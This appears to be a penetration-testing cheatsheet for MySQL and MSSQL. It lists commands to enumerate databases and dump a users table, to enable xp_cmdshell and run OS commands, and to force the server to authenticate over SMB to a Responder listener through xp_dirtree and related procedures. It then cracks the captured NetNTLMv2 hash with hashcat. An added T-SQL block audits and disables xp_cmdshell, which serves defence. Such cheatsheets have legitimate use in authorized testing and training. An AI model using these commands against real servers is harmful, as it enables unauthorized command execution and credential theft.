
SQL

MySQL

Read the server configuration without comments or blank lines, then connect to the remote instance.

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
mysql -h 10.10.10.10 -u root -p

Enumerate from the MySQL prompt.

show databases; # Show all databases.
select version(); # Show the server version.
use qu35t; # Select one of the existing databases.
show tables; # Show all available tables in the selected database.
select * from users; # Show everything in the desired table.

MSSQL

mssqlclient.py qu35t@10.10.10.10 -windows-auth
select name from sys.databases; -- List databases
select TABLE_NAME from Backup.INFORMATION_SCHEMA.TABLES; -- List tables of a database
select * from Backup.dbo.Users; -- Extract data from a table

Enable the module, either with the mssqlclient.py built-in command or manually with sp_configure.

enable_xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Execute a command.

exec xp_cmdshell 'whoami'
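For the defender's side of the xp_cmdshell steps above, here is an added T-SQL audit (not from the original cheatsheet) that shows whether the procedure is enabled, lists who has been granted EXECUTE on it, and reverts the setting; it assumes a login with ALTER SETTINGS permission (sysadmin or serveradmin).

```sql
-- Added example, not part of the original cheatsheet: audit the state that the
-- enable_xp_cmdshell steps leave behind and revert it. Assumes a login that
-- holds ALTER SETTINGS (sysadmin/serveradmin).
USE master;

-- 1. Is xp_cmdshell switched on? value_in_use is the running setting.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who besides sysadmin can call it? An explicit EXECUTE grant in master
--    lets that principal run OS commands as the service or proxy account.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.objects AS o ON o.object_id = pe.major_id AND pe.class = 1
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE o.name = 'xp_cmdshell';

-- 3. Revert: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Confirm: expect value_in_use = 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```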

Start Responder on the listening interface so the server's outbound SMB connection to it can be captured.

responder -I tun0

Use xp_dirtree to make the server connect to the share.

exec xp_dirtree '\\10.10.10.10\qu35t\'

Use xp_subdirs.

exec xp_subdirs '\\10.10.10.10\qu35t\'

Use xp_fileexist.

exec xp_fileexist '\\10.10.10.10\qu35t\'

Crack the captured NetNTLMv2 hash (hashcat mode 5600).

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Last updated 2 years ago